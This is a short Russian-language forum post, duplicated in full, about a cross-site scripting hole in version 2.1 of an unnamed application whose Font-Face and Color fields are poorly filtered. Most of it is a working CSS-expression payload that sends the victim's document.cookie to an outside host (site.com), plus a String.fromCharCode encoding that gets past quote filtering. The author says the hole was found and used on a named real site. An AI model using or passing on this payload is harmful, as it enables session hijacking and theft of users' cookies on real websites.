Inviz
06.04.2007, 17:18
Уязвима последняя версия 2.1. Остальные просто не видел.
Плохо фильтруются поля Font-Face и Color. Поэтому можно послать в поле color подобный запрос:
#000000;width:expression(alert(document.cookie));
Кавычки там фильтруются, поэтому можно воспользоваться чаркодами:
img = new Image(); img.src = "http://site.com"+document.cookie;
Перекодируем в char:
105, 109, 103, 32, 61, 32, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 116, 101, 46, 99, 111, 109, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59
Используем:
#000000;width:expression(eval( String.fromCharCode(105, 109, 103, 32, 61, 32, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 116, 101, 46, 99, 111, 109, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59)));
Обнаруженно и заюзано на dotapick.ru
Плохо фильтруются поля Font-Face и Color. Поэтому можно послать в поле color подобный запрос:
#000000;width:expression(alert(document.cookie));
Кавычки там фильтруются, поэтому можно воспользоваться чаркодами:
img = new Image(); img.src = "http://site.com"+document.cookie;
Перекодируем в char:
105, 109, 103, 32, 61, 32, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 116, 101, 46, 99, 111, 109, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59
Используем:
#000000;width:expression(eval( String.fromCharCode(105, 109, 103, 32, 61, 32, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 59, 32, 105, 109, 103, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 116, 101, 46, 99, 111, 109, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59)));
Обнаруженно и заюзано на dotapick.ru